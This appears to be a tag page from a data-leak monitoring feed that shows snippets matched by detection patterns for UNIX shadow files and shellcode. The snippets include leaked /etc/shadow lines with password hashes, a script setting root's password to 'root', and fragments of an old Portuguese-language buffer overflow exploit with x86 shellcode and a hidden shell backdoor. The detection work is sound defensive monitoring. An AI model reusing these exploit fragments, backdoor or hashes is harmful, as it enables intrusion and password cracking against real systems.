Posts Tagged ‘UNIX Shadow File’
Potential leak of data: UNIX Shadow File
0 votedvote
Detected 2 occurrence(s) of ‘root:.*:0:99999:7:::’:
2001, here we come
[root@sucuri www]# cat /etc/shadow
root:iFvywDsrRwmjI:15755:0:99999:7:::
bin:*:14746:0:99999:7:::
daemon:*:14746:0:99999:7:::
adm:*:14746:0:99999:7:::
Potential leak of data: UNIX Shadow File
0 votedvote
Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’:
tc/default/rcS if [ -e $ROOT/etc/blkid.tab ]; then rm $ROOT/etc/blkid.tab fi ln -s /dev/null $ROOT/etc/blkid.tab if [ -e $ROOT/etc/mtab ]; then rm $ROOT/etc/mtab fi ln -s /proc/mounts $ROOT/etc/mtab # root password is 'root' sed -i 's,^root:.*$,root:$1$XPo5vyFS$iJPfS62vFNO09QUIUknpm.:14360:0:99999:7:::,' $ROOT/etc/shadow chroot $ROOT /usr/bin/apt-get clean ##### All Done cd / umount $ROOT > /dev/null 2>&1 echo "" echo "" echo "" echo "" echo "Installation complete" echo "" echo "You can now reboot your device into Debian." echo
Potential leak of data: Shellcode
0 votedvote
Detected 19 occurrence(s) of ‘shellcode’:
sh";
char buffer[82];
void main() {
int i;
long *long_ptr = (long *) buffer;
for (i = 0; i < 32; i++)
*(long_ptr + i) = 0xbffff9ac; //Mude aki o endereco do buffer vuln
for (i = 0; i < strlen(shellcode); i++)
buffer[i] = shellcode[i];
execl(PROG,PROG,"-h4ckm3",buffer,0);
}
<-->
Deu pra entender neh???
#########
# 4a. #
#########
Igual a anterior mas para os mais preguisosos.
if(strcmp(argv[1],"-h4ckm3")==0)
execl("/bin/sh", "sh", "-i", 0);
Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’:
pode pegar facilmente seu arquivo de senhas: Script started on Thu Mar 2 00:17:48 2000 [struck@localhost ~]$ dos -F /etc/shadow CPU speed set to 378/1 MHz Running on CPU=586, FPU=1, rdtsc=1 Error in /etc/shadow: (line 001) unrecognized command 'root:SAlNq/oiIe8ik:11018:0:99999:7:::' Error in /etc/shadow: (line 002) unrecognized command 'bin:x:11018:0:99999:7:::' Error in /etc/shadow: (line 003) unrecognized command 'daemon:x:11018:0:99999:7:::' Error in /etc/shadow: (line 004) unrecognized command 'adm:x:11018:0:99999:7:::' Erro
Detected 8 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:
sta-le o prog em cima do antigo. O exploit esta aqui.
<++> secret/xploit.c
#define PROG "/bin/login" // Coloque o prog ataquado aki!!!
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char buffer[82];
void main() {
int i;
long *long_ptr = (long *) buffer;
for (i = 0; i < 32; i++)
*(long_ptr + i) = 0xbffff9ac; //Mude aki o endereco do buffer vu
Potential leak of data: UNIX Shadow File
0 votedvote
Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’:
[root@localhost log]# grep andrew /etc/*shadow [root@localhost log]# cat /etc/shadow root:*:15816:0:99999:7::: bin:*:15816:0:99999:7::: daemon:*:15816:0:99999:7::: adm:*:15816:0:99999:7::: lp:*:15816:0:99999:7::: sync:*:15816:0:99999:7::: shutdown:*:15816:0:99999:7::: halt:*:15816:0:99999:7::: mail:*:15816:0:99999:7::: news:*:15816:0:99999:7::: uucp:*:15
Potential leak of data: UNIX Shadow File
0 votedvote
Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’:
root:$1$1wBApkrQ$oCmlaXcRtGpToShs5or9C.:15680:0:99999:7::: bsteinfeldibm:$6$nbaTjjGN$jpaD27f6Kp7KH2bjToUz6V7DN2z2XzFk5Ce8Fx5HGL2tAiEQcj5ulNBGTOvrHSRJw4ipMJvs2BLz0zQeyDMtH1:15694:0:99999:7::: ibm:$6$AM6RqCLQ$lWJmzZPD8JY6Q6cMKU4YM9fVuVCg7Ko1nm1UiHqTMqhBcuJ0NF2Ze4D00mrrl.VnwoSacdkQsAi6kUlAv32Fw0:15694:0:99999:7:::